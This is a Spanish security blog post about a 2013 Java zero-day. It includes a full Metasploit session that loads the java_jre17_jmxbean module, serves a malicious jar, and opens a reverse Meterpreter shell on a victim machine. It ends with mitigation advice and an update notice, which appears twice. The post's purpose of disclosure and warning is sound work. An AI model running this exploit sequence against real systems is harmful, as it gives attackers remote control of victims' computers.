A finales de Agosto salió una importante vulnerabilidad en Java, un 0 day, que fue ampliamente explotado. Oracle no tardó demasiado en sacar un parque que evitaba su explotación, aunque en ese tiempo muchos sistemas ya habían caído. Esta semana apareció nuevamente un 0 day, que afecta a la última versión de Java y sin un parche disponible a fecha de hoy. Dicho 0 day permite la ejecución de código arbitrario en el equipo víctima.
Ya existe un pequeño módulo en metasploit que simplifica la explotación de dicha vulnerabilidad y lo único que es necesario es acceder a una página con el código ejecutándose y que el navegador de la víctima tenga el plugin de java activado.
msf> use exploit/multi/browser/java_jre17_jmxbean msf exploit(java_jre17_jmxbean)> show options Module options (exploit/multi/browser/java_jre17_jmxbean): Name Setting Required Description ---- ------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections. SSLCert no Path to a custom SSL certificate. SSLVersion SSL3 no Specify the version of SSL URIPATH no The URI to use for this exploit Exploit target: Id Name -- ---- 0 Generic (Java Payload) msf exploit(java_jre17_jmxbean)> set SRVPORT 80 SRVPORT => 80 msf exploit(java_jre17_jmxbean)> set URIPATH / URIPATH => / msf exploit(java_jre17_jmxbean)> exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.33:4444 [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://192.168.1.33:80/ [*] Server started. msf exploit(java_jre17_jmxbean)> [*] 192.168.1.47 java_jre17_jmxbean - handling request for / [*] 192.168.1.47 java_jre17_jmxbean - handling request for / [*] 192.168.1.47 java_jre17_jmxbean - handling request for /GapYRtBm.jar [*] 192.168.1.47 java_jre17_jmxbean - handling request for /GapYRtBm.jar [*] Sending stage (30216 bytes) to 192.168.1.47 [*] Meterpreter session 1 opened (192.168.1.33:4444 -> 192.168.1.47:2391) at 2013-01-10 20:41:37 +0100 msf exploit(java_jre17_jmxbean)> sessions -i 1 [*] Starting interaction with 1... meterpreter>
Actualmente no hay ninguna solución para evitar este ataque, así que toca volver a desactivar Java en nuestros navegadores urgentemente!
Si usas Google Chrome, lo puedes arrancar con la opción --disable-java.
¡Actualización!
Oracle acaba de sacar una nueva versión de java, la 7u11, que soluciona el 0 day comentado. Se recomienda actualización inmediata. Como nota destacada de esta nueva versión, hay que destacar que suben el nivel de seguridad de medio a alto, por defecto y que sólo permitirán la ejecución de applets firmados y validados por CA's.
¡Actualización!
Oracle acaba de sacar una nueva versión de java, la 7u11, que soluciona el 0 day comentado. Se recomienda actualización inmediata. Como nota destacada de esta nueva versión, hay que destacar que suben el nivel de seguridad de medio a alto, por defecto y que sólo permitirán la ejecución de applets firmados y validados por CA's.
La entrada java_jre17_jmxbean 0 day exploit la puedes leer en Puppet Linux.
No hay comentarios :
Publicar un comentario